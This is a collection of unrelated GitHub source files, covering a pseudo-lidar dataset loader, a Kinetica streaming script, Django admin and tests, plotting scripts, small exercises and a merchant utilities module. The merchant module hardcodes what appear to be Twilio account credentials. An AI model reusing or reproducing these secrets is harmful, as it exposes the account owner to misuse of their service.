data['rears'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_rears[i]), scale=self.scale, crop=self.input_resolution))))
"""
lidar_unprocessed = np.load(seq_lidars[i])[..., :3] # lidar: XYZI
full_lidar.append(lidar_unprocessed)
"""
pc_front = self.pc_generator.generate(seq_depth_fronts[i], max_depth=0.03)
pc_left = self.pc_generator.generate(seq_depth_lefts[i], max_depth=0.03)
pc_right = self.pc_generator.generate(seq_depth_rights[i], max_depth=0.03)
pc_rear = self.pc_generator.generate(seq_depth_rears[i], max_depth=0.03)
pseudolidar = self.lidar_generator.generate([pc_front, pc_left, pc_right, pc_rear])
full_lidar.append(pseudolidar)
# fix for theta=nan in some measurements
if np.isnan(seq_theta[i]):
seq_theta[i] = 0.
ego_x = seq_x[i]
ego_y = seq_y[i]
ego_theta = seq_theta[i]
# future frames
for i in range(self.seq_len, self.seq_len + self.pred_len):
lidar_unprocessed = np.load(seq_lidars[i])
full_lidar.append(lidar_unprocessed)
# lidar and waypoint processing to local coordinates
waypoints = []
for i in range(self.seq_len + self.pred_len):
# waypoint is the transformed version of the origin in local coordinates
# we use 90-theta instead of theta
# LBC code uses 90+theta, but x is to the right and y is downwards here
local_waypoint = transform_2d_points(np.zeros((1, 3)),
np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta, -ego_x, -ego_y)
waypoints.append(tuple(local_waypoint[0, :2]))
# process only past lidar point clouds
if i < self.seq_len:
# convert coordinate frame of point cloud
"""
full_lidar[i][:, 1] *= -1 # inverts x, y
full_lidar[i] = transform_2d_points(full_lidar[i],
np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta, -ego_x, -ego_y)
lidar_processed = lidar_to_histogram_features(full_lidar[i], crop=self.input_resolution)
"""
lidar_processed = PseudoLidarGenerator.post_process(full_lidar[i])
lidar_processed = PseudoLidarGenerator.project_to_bev(lidar_processed)
data['lidars'].append(lidar_processed.copy())
data['waypoints'] = waypoints
# convert x_command, y_command to local coordinates
# taken from LBC code (uses 90+theta instead of theta)
R = np.array([
[np.cos(np.pi/2+ego_theta), -np.sin(np.pi/2+ego_theta)],
[np.sin(np.pi/2+ego_theta), np.cos(np.pi/2+ego_theta)]
])
local_command_point = np.array([self.x_command[index]-ego_x, self.y_command[index]-ego_y])
local_command_point = R.T.dot(local_command_point)
data['target_point'] = tuple(local_command_point)
data['steer'] = self.steer[index]
data['throttle'] = self.throttle[index]
data['brake'] = self.brake[index]
data['command'] = self.command[index]
data['velocity'] = self.velocity[index]
return data
def lidar_to_histogram_features(lidar, crop=256):
"""
Convert LiDAR point cloud into 2-bin histogram over 256x256 grid
"""
def splat_points(point_cloud):
# 256 x 256 grid
pixels_per_meter = 16
hist_max_per_pixel = 5
x_meters_max = 8
y_meters_max = 16
xbins = np.linspace(-2*x_meters_max, 2*x_meters_max+1, 2*x_meters_max*pixels_per_meter+1)
ybins = np.linspace(-y_meters_max, 0, y_meters_max*pixels_per_meter+1)
hist = np.histogramdd(point_cloud[..., :2], bins=(xbins, ybins))[0]
hist[hist > hist_max_per_pixel] = hist_max_per_pixel
overhead_splat = hist/hist_max_per_pixel
return overhead_splat
below = lidar[lidar[..., 2] <= -2.0]
above = lidar[lidar[..., 2] > -2.0]
below_features = splat_points(below)
above_features = splat_points(above)
features = np.stack([below_features, above_features], axis=-1)
features = np.transpose(features, (2, 0, 1)).astype(np.float32)
return features
def scale_and_crop_image(image, scale=1, crop=256):
"""
Scale and crop a PIL image, returning a channels-first numpy array.
"""
# image = Image.open(filename)
(width, height) = (int(image.width // scale), int(image.height // scale))
im_resized = image.resize((width, height))
image = np.asarray(im_resized)
start_x = height//2 - crop//2
start_y = width//2 - crop//2
cropped_image = image[start_x:start_x+crop, start_y:start_y+crop]
cropped_image = np.transpose(cropped_image, (2, 0, 1))
return cropped_image
def transform_2d_points(xyz, r1, t1_x, t1_y, r2, t2_x, t2_y):
"""
Build a rotation matrix and take the dot product.
"""
# z value to 1 for rotation
xy1 = xyz.copy()
xy1[:, 2] = 1
c, s = np.cos(r1), np.sin(r1)
r1_to_world = np.matrix([[c, s, t1_x], [-s, c, t1_y], [0, 0, 1]])
# np.dot converts to a matrix, so we explicitly change it back to an array
world = np.asarray(r1_to_world @ xy1.T)
c, s = np.cos(r2), np.sin(r2)
r2_to_world = np.matrix([[c, s, t2_x], [-s, c, t2_y], [0, 0, 1]])
world_to_r2 = np.linalg.inv(r2_to_world)
out = np.asarray(world_to_r2 @ world).T
# reset z-coordinate
out[:, 2] = xyz[:, 2]
return out
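# A minimal sanity check (made-up numbers, hypothetical helper name) for
# transform_2d_points: a point at the origin of frame 1, with frame 1
# translated by (1, 0) and frame 2 left at the world origin, comes out at
# (1, 0); the z column is passed through unchanged.
def _transform_2d_points_example():
    pt = np.zeros((1, 3))
    out = transform_2d_points(pt, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0)
    return out  # ~ [[1., 0., 0.]]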
|
jonathsch/multisensor
|
pseudolidar/pseudo_lidar_dataset.py
|
pseudo_lidar_dataset.py
|
py
| 18,526 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28960969271
|
import gpudb
import collections
import time
import pandas as pd
pd.options.display.max_columns = 100
pd.set_option('display.width', 10000)
# init
TABLE = "risk_inputs"
COLLECTION = "RISK"
NEW_TABLE = "bs_stream"
HOST = "<ipaddress>"
ENCODING = "binary"
PORT = "9191"
DATA_PACK = 1
INGEST_FREQ = 3
"Execute python scripts on Kinetica servers using"
"/opt/gpudb/bin/gpudb_python"
# Establish connection to database with necessary credentials
# Pull data from Kinetica and put it directly into a Pandas df
h_db = gpudb.GPUdb(
encoding=ENCODING,
host=HOST,
port=PORT,
username="<username>",
password="<password>")
if h_db.has_table(table_name=TABLE)['table_exists']:
print("Table successfully reached.")
else:
print("Table not found.")
# Pull data from Kinetica and put it directly into a Pandas df
data = h_db.get_records(table_name=TABLE,offset=0,limit=gpudb.GPUdb.END_OF_SET,encoding=ENCODING)
df = pd.DataFrame(gpudb.GPUdbRecord.decode_binary_data(data["type_schema"], data["records_binary"]))
# Column instantiation for the target table
columns = [
["symbol","string"],
["spot_price","float"],
["option_type","string"],
["exposure","string"],
["strike_price","float"],
["maturity_y","int"],
["maturity_m","int"],
["maturity_d","int"],
["calendar","string"],
["day_count","string"],
["risk_free_rate","float"],
["dividend_rate","float"],
["calc_dt_y","int"],
["calc_dt_m","int"],
["calc_dt_d","int"],
["volatility","float"]
]
# Clear the table at run time, then create the table
no_error_option = {"no_error_if_not_exists": "true"}
h_db.clear_table(table_name=NEW_TABLE, options=no_error_option)
collection_option_object = gpudb.GPUdbTableOptions.default().collection_name(COLLECTION)
print("Table cleared")
try:
table_gps_obj = gpudb.GPUdbTable(
columns,
NEW_TABLE,
collection_option_object,
h_db
)
print("Table created succesfully")
except gpudb.GPUdbException as e:
print("Table creation failure: {}".format(str(e)))
print(df.head(5))
index = 0
h_db = gpudb.GPUdb(encoding=ENCODING,host=HOST,port=PORT)
# Implement the GpuDB table class instead of manual JSON
my_type = """
{
"type": "record",
"name": "type_name",
"fields": [
{"name": "symbol","type": "string"},
{"name": "spot_price","type": "float"},
{"name": "option_type","type": "string"},
{"name": "exposure","type": "string"},
{"name": "strike_price","type": "float"},
{"name": "maturity_y","type": "int"},
{"name": "maturity_m","type": "int"},
{"name": "maturity_d","type": "int"},
{"name": "calendar","type": "string"},
{"name": "day_count","type": "string"},
{"name": "risk_free_rate","type": "float"},
{"name": "dividend_rate","type": "float"},
{"name": "calc_dt_y","type": "int"},
{"name": "calc_dt_m","type": "int"},
{"name": "calc_dt_d","type": "int"},
{"name": "volatility","type": "float"}
]
}""".replace('\n', '').replace(' ', '')
def stream_ingest(df):
"""This method parses the df and inserts the data into Kinetica row by row
with a 3 second delay in between rows"""
global index
i=0
coords= []
datum = collections.OrderedDict()
for index, row in df.iterrows():
datum["symbol"]=str(df.iloc[index,0])
datum["spot_price"]=float(df.iloc[index,1])
datum["option_type"] = str(df.iloc[index, 4])
datum["exposure"] = str(df.iloc[index, 6])
datum["strike_price"] = float(df.iloc[index, 7])
datum["maturity_y"] = int(df.iloc[index, 8])
datum["maturity_m"] = int(df.iloc[index, 9])
datum["maturity_d"] = int(df.iloc[index, 10])
datum["calendar"] = str(df.iloc[index, 11])
datum["day_count"] = str(df.iloc[index, 12])
datum["risk_free_rate"] = float(df.iloc[index, 13])
datum["dividend_rate"] = float(df.iloc[index, 14])
datum["calc_dt_y"] = int(df.iloc[index, 15])
datum["calc_dt_m"] = int(df.iloc[index, 16])
datum["calc_dt_d"] = int(df.iloc[index, 17])
datum["volatility"] = float(df.iloc[index, 18])
coords.append(h_db.encode_datum(my_type, datum))
i= i + 1
# Pump data in batches
if i % DATA_PACK == 0:
response = h_db.insert_records(
table_name=NEW_TABLE,
data=coords,
list_encoding=ENCODING,
options={})
coords = []
time.sleep(INGEST_FREQ)
print(response)
# Flush the last batch
if i % DATA_PACK != 0:
response = h_db.insert_records(
table_name=NEW_TABLE,
data=coords,
list_encoding=ENCODING,
options={})
# 3 second delay to mimic real time ingest
time.sleep(INGEST_FREQ)
print(response)
return coords
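# Batching example (illustrative numbers): with DATA_PACK = 1, every encoded
# row is flushed immediately (true row-by-row streaming); with, say,
# DATA_PACK = 50, the loop would buffer 50 records per insert_records() call
# and the trailing `if i % DATA_PACK != 0` block flushes the remainder
# (e.g. 120 rows -> 50 + 50 + 20).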
if __name__ == "__main__":
stream_ingest(df)
|
nickalonso/Utilities
|
stream.py
|
stream.py
|
py
| 5,101 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72774157309
|
def Productsmallpair(sum, arr):
    if len(arr) < 2:
        return -1
    arr = sorted(arr)
    hashMap = dict()
    for i in range(len(arr)):
        hashMap[arr[i]] = hashMap.get(arr[i], 0) + 1
    for i in range(len(arr)):
        num1 = arr[i]
        num2 = sum - num1
        # num2 must exist as a different element (or occur at least twice)
        if hashMap.get(num2) is not None and (num2 != num1 or hashMap[num2] > 1):
            return num1 * num2
    return 0
def productSmall(sum, arr):
if len(arr)<2:
return -1
arr = sorted(arr)
for i in range(1, len(arr)):
if((arr[i]+arr[i-1]) <= sum):
return arr[i]*arr[i-1]
return 0
sum = int(input())
arr = list(map(int, input().split()))
print(productSmall(sum, arr))
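# Worked example (made-up input): with sum = 9 and arr = [5, 2, 4, 6], the
# sorted array is [2, 4, 5, 6]; the first adjacent pair sums to 2 + 4 = 6 <= 9,
# so productSmall returns 2 * 4 = 8.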
|
V-nsh/DSA
|
accenture practice/from_coding_ninjas_Site/Productsmallpair.py
|
Productsmallpair.py
|
py
| 642 |
python
|
en
|
code
| 1 |
github-code
|
6
|
30107078628
|
""" Python Package Imports """
# Not Applicable
""" Django Package Support """
from django.contrib import admin
""" Internal Package Support """
""" -- IMPORTED AT APPROPRIATE SUBSECTION -- """
"""
event/admin.py
Author: Matthew J Swann
Version: 1.0
Last Update: 2014-06-05
Update by: Matthew J Swann
"""
class EventAdmin(admin.ModelAdmin):
list_display = ('id', 'date', 'company_tag', 'city','state')
list_filter = ('state',)
search_fields = ['date', 'company_tag', 'state', 'creator_tag', 'date_created']
ordering = ['date', 'city', 'state']
fieldsets = (
( 'Advanced options', {
'classes': ('wide', 'extrapretty'),
'fields' : ('date_created', 'creator_tag', 'company_tag', 'date', 'date_time_start',
'date_time_end',
'title',
'sessionStart', 'sessionEnd', 'addressLineOne', 'addressLineTwo', 'city',
'state', 'zipCode')
}),)
from Event.models import (
Event
)
admin.site.register(Event, EventAdmin)
|
mjs0031/view_trials
|
Event/admin.py
|
admin.py
|
py
| 1,197 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32481834912
|
import matplotlib.pyplot as plt
import pandas as pd
import tensorflow as tf
from constants import nb_class
from tracking import get_dataframes
tf.compat.v1.enable_eager_execution() # Remove when switching to tf2
pd.plotting.register_matplotlib_converters()
###############################
# Methods for data formatting #
###############################
def get_n_probs_per_label(df):
outputs = []
for n in range(7):
outputs.append([[], [], [], [], [], [], []])
def handle_row(row):
classification_logits = eval(row["classification_logits"])
right_labels = eval(row["label_boxes"])
for i in range(len(classification_logits)):
logits = classification_logits[i]
right_label = right_labels[i]
probs = tf.nn.softmax(logits).numpy().tolist()
for n in range(7):
n_prob = probs[n]
outputs[right_label][n].append(n_prob)
df.apply(handle_row, axis=1)
    for n in range(7):
        for i in range(len(outputs[n])):
            if outputs[n][i] == []:
                outputs[n][i] = [-1.]  # placeholder so violinplot gets non-empty data
    return outputs
def get_precision_distribution(df):
outputs = [[[], []], [[], []]]
def handle_row(row):
no_regr_precision = eval(row["no_regr_surface_precision"])[0]
final_precision = eval(row["final_surface_precision"])[0]
outputs[0][0].append(no_regr_precision[0] / no_regr_precision[1])
outputs[0][1].append(final_precision[0] / final_precision[1])
outputs[1][0].append(no_regr_precision[0])
outputs[1][1].append(final_precision[0])
df.apply(handle_row, axis=1)
return outputs
#########################################
# Initializing dataframes and variables #
#########################################
df = get_dataframes()
nb_rows = df["index"].count()
print("Dataframe size: {}".format(nb_rows))
df_tail = df.tail(1000)
all_probs_per_label = get_n_probs_per_label(df_tail)
precision_data = get_precision_distribution(df_tail)
############
# Plotting #
############
fig = plt.figure(figsize=(18, 12))
fig.canvas.set_window_title("Faster-RCNN graph - Last 1000 rows over {} total".format(nb_rows))
# Prob of label tail
plt.subplot(5, 2, 1)
probs_per_label = []
for k in range(7):
probs_per_label.append(all_probs_per_label[k][k])
parts = plt.violinplot(probs_per_label)
plt.xticks([])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Label Prob density")
# Prob of n label tail
for i in range(7):
plt.subplot(5, 2, 2 + i)
probs_per_label = all_probs_per_label[i]
parts = plt.violinplot(probs_per_label)
plt.xticks([])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_facecolor("#D43F3A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Prob density of {}".format(i))
# Precision distribution
plt.subplot(5, 2, 9)
parts = plt.violinplot(precision_data[0])
plt.xticks([1, 2], ["No Regr", "Final"])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_color("#F3C43A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Precision density")
# Coverage distribution
plt.subplot(5, 2, 10)
parts = plt.violinplot(precision_data[1])
plt.xticks([1, 2], ["No Regr", "Final"])
plt.yticks([144], ["Blob\nSurface"])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_color("#F3C43A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
ax = plt.gca()
ax.axhline(y=144, color="black", lw=1., alpha=.2)
plt.title("Coverage density")
plt.show()
|
benoitkoenig/blobWar-image
|
faster_rcnn/visualization.py
|
visualization.py
|
py
| 3,864 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27009683508
|
from sklearn.gaussian_process import GaussianProcessRegressor
def run(x_train, y_train, x_test, y_test,
kernel, alpha, optimizer, n_restarts_optimizer, normalize_y, copy_X_train, random_state
):
reg = GaussianProcessRegressor(kernel=kernel,
alpha=alpha,
optimizer=optimizer,
n_restarts_optimizer=n_restarts_optimizer,
normalize_y=normalize_y,
copy_X_train=copy_X_train,
random_state=random_state).fit(x_train, y_train)
return {'train_predict': reg.predict(x_train).tolist(),
'test_predict': reg.predict(x_test).tolist(),
'train_score': reg.score(x_train, y_train),
'test_score': reg.score(x_test, y_test),
'X_train_': reg.X_train_.tolist(),
'y_train_': reg.y_train_.tolist(),
'L_': reg.L_.tolist(),
'alpha_': reg.alpha_.tolist(),
'log_marginal_likelihood_value_': reg.log_marginal_likelihood_value_}
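# A minimal usage sketch (made-up data); the keyword values below mirror
# sklearn's GaussianProcessRegressor defaults.
if __name__ == '__main__':
    import numpy as np
    x = np.linspace(0.0, 1.0, 8).reshape(-1, 1)
    y = x.ravel() ** 2
    out = run(x[:6], y[:6], x[6:], y[6:],
              kernel=None, alpha=1e-10, optimizer='fmin_l_bfgs_b',
              n_restarts_optimizer=0, normalize_y=False,
              copy_X_train=True, random_state=0)
    print(out['train_score'], out['test_score'])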
|
lisunshine1234/mlp-algorithm-python
|
machine_learning/regression/gaussian_processes/GaussianProcessRegressor/run.py
|
run.py
|
py
| 1,133 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36052032500
|
import cv2
cap = cv2.VideoCapture(1,cv2.CAP_DSHOW)
if not cap.isOpened():
    print("Can't open camera")
    exit(0)
cap.set(3,480)
cap.set(4,720)
cnt = 80
path = "Main_picture/"
ret,frame = cap.read()
H,W,_ = frame.shape
while True:
ret,frame = cap.read()
cv2.circle(frame,(W//2,H//2),5,(0,255,0),-1)
key = cv2.waitKey(30)
if ret:
if key == ord("s"):
cv2.imwrite(f"{path}Img_{cnt}.jpg",frame)
cnt += 1
        # Press ESC or q to quit
cv2.imshow("Result",frame)
if key == 27 or key == ord("q"): break
cap.release()
cv2.destroyAllWindows()
|
HieunnUTE/Rubik-solver-with-Image-processing
|
capture.py
|
capture.py
|
py
| 628 |
python
|
en
|
code
| 3 |
github-code
|
6
|
20800499152
|
n = int(input())
def prime_factors(n):
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
product = 1
factors = prime_factors(n)
# multiply (exponent + 1) once per distinct prime factor
for i in set(factors):
    product *= factors.count(i) + 1
print(product)
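# Worked example: n = 12 has prime factors [2, 2, 3], i.e. 2**2 * 3**1, so the
# number of divisors is (2 + 1) * (1 + 1) = 6, namely 1, 2, 3, 4, 6, 12.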
|
michbogos/olymp
|
335/K.py
|
K.py
|
py
| 384 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42483090749
|
# pylint: disable=redefined-outer-name, unused-argument
"""
test src/config.py
"""
from contextlib import contextmanager
import pytest
from src.config import ConfigLoader
@contextmanager
def mock_open(config_content):
"""
Create config from mock file
"""
try:
yield config_content
finally:
pass
@pytest.fixture
def mock_open_config(monkeypatch):
"""
Mock a config file
"""
config_content = """
key1: value1
key2: value2
"""
monkeypatch.setattr(
'builtins.open',
lambda *args,
**kwargs: mock_open(config_content))
@pytest.fixture
def config_loader(mock_open_config):
"""
Return an instance of mocked configloader
"""
return ConfigLoader()
def test_load_config(config_loader):
"""
Test that config is loaded and accessible
"""
# Load the config
config = config_loader.load_config()
# Assert that the config is loaded and of the expected type
assert isinstance(config, dict)
# Add additional assertions based on your config structure and content
assert "key1" in config
assert config["key1"] == "value1"
|
dom38/secret-distribution-operator
|
tests/config_test.py
|
config_test.py
|
py
| 1,161 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30513785226
|
from gaesessions import get_current_session
import logging
import levr_classes as levr
import levr_encrypt as enc
import base64
from google.appengine.api import urlfetch,taskqueue
import json
import urllib
from datetime import datetime, timedelta
def login_check(self):
    ''' for merchants ONLY
    check if logged in and return the header data if so; if not, bounce to the login page'''
session = get_current_session()
logging.debug(session)
if session.has_key('loggedIn') == False or session['loggedIn'] == False:
#not logged in, bounce to login page
logging.info('Not logged in. . .Bouncing!')
self.redirect('/merchants/login')
elif session.has_key('loggedIn') == True and session['loggedIn'] == True:
uid = session['uid']
owner_of = session['owner_of']
logging.info(uid)
headerData = {
'loggedIn' : session['loggedIn'],
'uid' : enc.decrypt_key(uid),
'owner_of' : enc.decrypt_key(owner_of),
'validated' : session['validated']
}
#return user metadata.
return headerData
return
def login_check_mobile(self):
session = get_current_session()
logging.debug(session)
if session.has_key('loggedIn') == False or session['loggedIn'] == False:
#not logged in, bounce to login page
logging.info('Not logged in. . .Bouncing!')
self.redirect('/merchants/mobile/login')
elif session.has_key('loggedIn') == True and session['loggedIn'] == True:
uid = session['uid']
owner_of = session['owner_of']
meta = {
'uid' : enc.decrypt_key(uid),
'owner_of' : enc.decrypt_key(owner_of)
}
logging.info(meta)
#return user metadata.
return meta
def validated_check(user):
'''checks if this user has any linked businesses or not. does not yet return these businesses'''
'''num_bus = user.businesses.count()
if num_bus > 0:
return True
else:
return False'''
if user.verified_owner == True:
return True
else:
return False
def create_deal(deal,business,owner):
'''deal: a deal object
merchant: the merchant to be set as the owner of the deal'''
# TODO: remove this. Deals are being created in too many places and some are missing info
#init tags
tags = []
#add tags from the merchant
tags.extend(business.create_tags())
logging.info(tags)
#add tags from deal stuff
tags.extend(levr.tagger(deal.deal_text))
logging.info(tags)
tags.extend(levr.tagger(deal.description))
logging.info(tags)
deal.tags = tags
#add some other miscellaneous information
deal.origin = 'merchant'
deal.pin_color = 'green'
#copy info over from business
deal.business_name = business.business_name
deal.businessID = str(business.key())
deal.business = business
deal.geo_point = business.geo_point
deal.geo_hash = business.geo_hash
deal.deal_status='active'
deal.date_end = None
deal.put()
logging.info(levr.log_model_props(deal))
#fire off a task to do the image rotation stuff
task_params = {
'blob_key' : str(deal.img.key())
}
taskqueue.add(url='/tasks/checkImageRotationTask',payload=json.dumps(task_params))
return deal
def call_merchant(business):
#call the business
#twilio credentials
sid = 'AC4880dbd1ff355288728be2c5f5f7406b'
token = 'ea7cce49e3bb805b04d00f76253f9f2b'
twiliourl='https://api.twilio.com/2010-04-01/Accounts/AC4880dbd1ff355288728be2c5f5f7406b/Calls.json'
auth_header = 'Basic '+base64.b64encode(sid+':'+token)
logging.info(auth_header)
request = {'From':'+16173608582',
'To':'+16052610083',
'Url':'http://www.levr.com/merchants/verify/answer',
'StatusCallback':'http://www.levr.com/merchants/verify/statusCallback'}
result = urlfetch.fetch(url=twiliourl,
payload=urllib.urlencode(request),
method=urlfetch.POST,
headers={'Authorization':auth_header})
logging.info(levr.log_dict(result.__dict__))
def check_ua(self):
uastring = str(self.request.headers['user-agent'])
logging.info(uastring)
if 'mobile' in uastring.lower():
logging.info('Serving mobile version')
return 'mobile'
else:
logging.info('Serving desktop version')
return 'desktop'
def mobile_ua_bounce(self):
uastring = str(self.request.headers['user-agent'])
logging.info(uastring)
if 'mobile' in uastring.lower():
logging.info('Serving mobile version')
else:
        logging.info('Not a mobile device - bouncing to /merchants/mobileonly desktop version')
self.redirect('/merchants/mobileonly')
|
holmesal/levr-2
|
merchant_utils.py
|
merchant_utils.py
|
py
| 4,377 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22023765931
|
#!/usr/bin/env python3
info = dict()
while True:
    e = input("Enter a name and an age separated by a space: ")
    if e == "sair" or e == "quit" or e == "exit":
        break
    dados = e.split()
    if len(dados) > 2:
        print("Use only one space between the values")
        continue
    try:
        info.update({dados[0]: int(dados[1])})
    except ValueError:
        print("The age must be an integer")
    except IndexError:
        print("Use a space between the name and the age")
### Now we can build the two lists
under30 = [pessoa for pessoa, idade in info.items() if idade < 30]
over30 = [pessoa for pessoa, idade in info.items() if idade >= 30]
print("under30 = " + str(under30))
print("over30 = " + str(over30))
|
Ruanfc/lista3_python_para_engenharia
|
10/main.py
|
main.py
|
py
| 748 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
74946284667
|
import random
# draws random integers from the given range and appends them to a list
def drawingNumbers():
i = 0
global randomNumbers
randomNumbers = []
while i < 10:
randomNumber = random.randint(1, 20)
randomNumbers.append(randomNumber)
i = i + 1
# counts the numbers greater than 5 and returns the result
def countNumbers():
numbersAmount = 0
for x in randomNumbers:
if x > 5:
numbersAmount = numbersAmount + 1
return numbersAmount
# computes the arithmetic mean of the numbers greater than 5 and returns it
def countArithmeticAvg():
arithemticAvg = 0
for x in randomNumbers:
if x > 5:
arithemticAvg = arithemticAvg + x
arithemticAvg = arithemticAvg / countNumbers()
arithemticAvg = round(arithemticAvg, 2)
return arithemticAvg
# computes the geometric mean of the numbers greater than 5 and returns it
def countGeometricAvg():
geometricAvg = 1
for x in randomNumbers:
if x > 5:
geometricAvg = geometricAvg * x
geometricAvg = geometricAvg ** (1/countNumbers())
geometricAvg = round(geometricAvg, 2)
return geometricAvg
# checks whether a number is prime and returns a boolean
def is_prime(n):
    if n < 2:
        return False
    for i in range(2, int(n ** 0.5) + 1):
        if (n % i) == 0:
            return False
    return True
# collects the prime numbers into a list and returns it
def countPrimeNumbers():
primeNumbers = []
for x in randomNumbers:
if is_prime(x):
primeNumbers.append(x)
return primeNumbers
# prints the results of the algorithms
def showResults():
    print('\n Drawn numbers:', randomNumbers)
    print('\n Count of numbers greater than 5:', countNumbers())
    print('\n Arithmetic mean of the numbers greater than 5:', countArithmeticAvg())
    print('\n Geometric mean of the numbers greater than 5:', countGeometricAvg())
    print('\n Drawn prime numbers:', countPrimeNumbers())
    input()
# call the functions
drawingNumbers()
showResults()
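# Worked example: if the drawn numbers greater than 5 were [8, 10, 18], the
# arithmetic mean would be (8 + 10 + 18) / 3 = 12.0 and the geometric mean
# (8 * 10 * 18) ** (1 / 3) = 1440 ** (1 / 3) ~ 11.29.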
|
damqu44/Python-Course
|
algorytmy/main.py
|
main.py
|
py
| 2,015 |
python
|
pl
|
code
| 0 |
github-code
|
6
|
26555794429
|
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from .models import RootObject, Uri
class ModelTestCase(TestCase):
    @classmethod
    def setUpTestData(cls):
        # Set up data for the whole TestCase
user_type = ContentType.objects.get(app_label="auth", model="user")
RootObject.objects.create(self_contenttype=user_type, name="foo")
RootObject.objects.create(self_contenttype=user_type)
def test_root_object(self):
rfoo = RootObject.objects.get(name="foo")
rnone = RootObject.objects.get(name="")
        self.assertEqual(str(rfoo), "foo")
        self.assertEqual(str(rnone), "no name provided")
def test_uri(self):
ufoo = Uri.objects.create()
        self.assertEqual(str(ufoo), "None")
|
acdh-oeaw/apis-core-rdf
|
apis_core/apis_metainfo/test_models.py
|
test_models.py
|
py
| 778 |
python
|
en
|
code
| 3 |
github-code
|
6
|
72698063549
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 21 10:29:50 2018
@author: qwzhou
"""
"""
=======================================
plot line and dash
=======================================
ASM across the site
"""
import numpy as np
import matplotlib.pyplot as plt
import sys
from matplotlib.backends.backend_pdf import PdfPages
#x = np.linspace(0, 10, 500)
y = []
z = []
k = []
def readfile(filename, y, z, k):
nline=0
with open(filename, 'r') as fig:
for line in fig:
data = line.split()
if nline == 0:
y.append(list(map(float,data[1:])))
elif nline == 1:
z.append(list(map(float,data[1:])))
elif nline == 2:
k.append(list(map(float,data[1:])))
nline=nline+1
#
#
#readfile("/Users/qiangweizhou/K562.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/IMR90.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/HepG2.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/A549.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/HUES64.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/GM12878.asmonGeneend.Methy.1.txt", y,z, k)
readfile("/Users/qiangweizhou/A549.asmonExpressionGene.Methy.1.txt.Aver", y,z, k)
readfile("/Users/qiangweizhou/A549.asmonUnGene.Methy.1.txt.Aver", y,z, k)
x = np.linspace(1, len(y[0]), len(y[0]))
label=['Expression', 'Unexpression']
#label=['K562', 'IMR90', 'HepG2', 'A549', 'HUES64', 'GM12878']
filename="ASMonGeneExpression.all"
filename2=filename + ".pdf"
nsample=2
legend=1
percentage=1
cutoff=6
######################################################
def find_martrix_max_value(data_matrix):
new_data=[]
for i in range(len(data_matrix)):
new_data.append(max(data_matrix[i]))
return max(new_data)
xlen=len(y[0])
print(xlen, xlen/2)
#######################################################
def plotline(x, y, title, label, nsample, legend, filename):
prosamp = 0
fig, ax = plt.subplots()
while prosamp < nsample:
y[prosamp] = [i*percentage for i in y[prosamp]]
#for i,item in enumerate(y[prosamp]):
# if item >6:
# y[prosamp][i]=6
ax.plot(x, y[prosamp], label=label[prosamp]) #,color="dodgerblue"
prosamp = prosamp +1
#dashes = [10, 5, 100, 5]
#line1.set_dashes(dashes) # dash line
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
#ax.spines['left'].set_visible(False)
ax.xaxis.set_major_formatter(plt.FuncFormatter('{:.0f}'.format))
#ax.yaxis.set_major_formatter(plt.FuncFormatter('{:.1f}%'.format))
#plt.grid(True, 'major', 'y', ls='--', lw=.5, c='k', alpha=.3)
plt.tick_params(axis='both', which='both', bottom=False, top=False,
labelbottom=True, left=False, right=False, labelleft=True)
#ax.axes.get_xaxis().set_visible(False)
if legend == 1:
plt.legend(loc='best', prop={'size': 12}) # legend , loc is the legend location
#plt.axvline(x=xlen/2-1, ls="--", color='black')
plt.axhline(y=0, xmin=0.05, xmax=0.5, linewidth=8, color='gray')
plt.axhline(y=0, xmin=0.5, xmax=0.505, linewidth=8, color='k' )
plt.axhline(y=0, xmin=0.505, xmax=0.95, linewidth=8, color='gray')
scale_ls = [1,len(x)/2,len(x)]
index_ls = ['-200bp','Start', "+200bp"]
plt.xticks(scale_ls,index_ls,color='k', size=15)
ax.set_title(title,size=15)
ax.set_ylabel('ASM distribution',size=15)
#ax.set_ylabel('Methylation Level',size=15)
maxy = 100
maxy = find_martrix_max_value(y) * 1.1
ax.set_ylim(0.0, maxy)
#plt.show()
#filename2=filename + ".png"
#plt.savefig(filename2, bbox_inches='tight')
#label = ['IMR90', 'A549', 'H1', 'GM12878', 'encodeA549']
